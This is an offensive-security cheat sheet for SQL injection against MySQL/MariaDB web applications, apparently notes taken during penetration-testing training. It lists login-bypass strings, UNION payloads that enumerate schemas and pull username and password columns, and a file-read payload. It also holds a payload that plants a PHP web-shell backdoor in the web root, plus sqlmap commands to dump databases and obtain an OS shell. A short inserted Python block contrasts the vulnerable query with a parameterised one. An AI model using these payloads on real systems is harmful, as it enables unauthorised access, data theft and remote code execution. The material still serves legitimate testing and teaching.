mysql -u root -p'root' -h <TARGET IP> -P 3306
Connect to MSSQL
impacket-mssqlclient Administrator:<PASSWORD>@<TARGET IP> -windows-auth
Basic SQL Syntax
SELECT * FROM users;
SELECT username FROM users WHERE id=1;
$query = "select * from users where username = '$user' and password = '$pass'";
Discover SQLi by inputting ' and "
Authentication Bypass (MariaDB / MySQL)
admin' or 1=1;#
Return 1 record
admin' or 1=1 LIMIT 1;#
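Added example, not from the original notes: the concatenated query from the PHP line above, re-expressed in Python against an in-memory sqlite3 table standing in for MariaDB, beside the parameterised form that the bypass payload cannot break. The sample users table is constructed; because sqlite uses `--` rather than MySQL's `#` for end-of-line comments, the payload is written with `--`.

```python
import sqlite3

# Constructed sample database (sqlite3 stands in for MariaDB/MySQL).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "S3cret!"), (2, "alice", "hunter2")])
    return con

def login_vulnerable(con, user, pw):
    # Same construction as the PHP $query line: user input is pasted straight
    # into the SQL text, so a quote in the input changes the statement.
    query = ("select * from users where username = '" + user +
             "' and password = '" + pw + "'")
    return con.execute(query).fetchall()

def login_safe(con, user, pw):
    # Parameterised query: values travel separately from the SQL text, so the
    # same input is only ever compared as a literal username string.
    query = "select * from users where username = ? and password = ?"
    return con.execute(query, (user, pw)).fetchall()

# The page's bypass payload, with sqlite's '--' comment in place of MySQL's '#'.
BYPASS = "admin' or 1=1 LIMIT 1-- "

if __name__ == "__main__":
    con = make_db()
    # Vulnerable: one row comes back although the password is wrong.
    print(login_vulnerable(con, BYPASS, "wrong"))
    # Safe: no user is literally named "admin' or 1=1 LIMIT 1-- ", so no row.
    print(login_safe(con, BYPASS, "wrong"))
```

In PHP the equivalent fix is a prepared statement (mysqli or PDO with bound parameters) instead of building `$query` from `$user` and `$pass`.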
SQLi Enumeration
- Enumerating the Database: '
- Enumerating Column Number:
1 ORDER BY 1;#
1 ORDER BY 1,2;#
1 ORDER BY 1,2,3;#
-- IF THE NEXT QUERY (ORDER BY 1,2,3,4) ERRORS, THE RESULT HAS 3 COLUMNS
1 ORDER BY 1,2,3,4;#
- Understanding the Layout of the Output:
1 union all select 1, 2, 3
Extracting Data from the Database
- Version of MariaDB:
1 union all select 1, 2, @@version
- Current database user:
1 union all select 1, 2, user()
- Extract table names:
1 union all select 1, 2, table_name from information_schema.tables
- Extract table columns:
1 union all select 1, 2, column_name from information_schema.columns
where table_name='users'
- Payload to extract the users table:
1 union all select 1, username, password from users
From SQL Injection to Code Execution
- Load files:
1 union all select 1, 2, load_file('C:/Windows/System32/drivers/etc/hosts')
- Create a malicious (backdoor) file on the web root:
1 union all select 1, 2, "<?php echo shell_exec($_GET['cmd']);?>"
into OUTFILE 'c:/xampp/htdocs/backdoor.php'
Automating SQL Injection
- Test id parameter:
sqlmap -u http://example.com/something.php?id=1 -p "id"
- Dump database:
sqlmap -u http://example.com/something.php?id=1 -p "id" --dbms=mysql --dump
- Get a shell:
sqlmap -u http://example.com/something.php?id=1 -p "id" --dbms=mysql --os-shell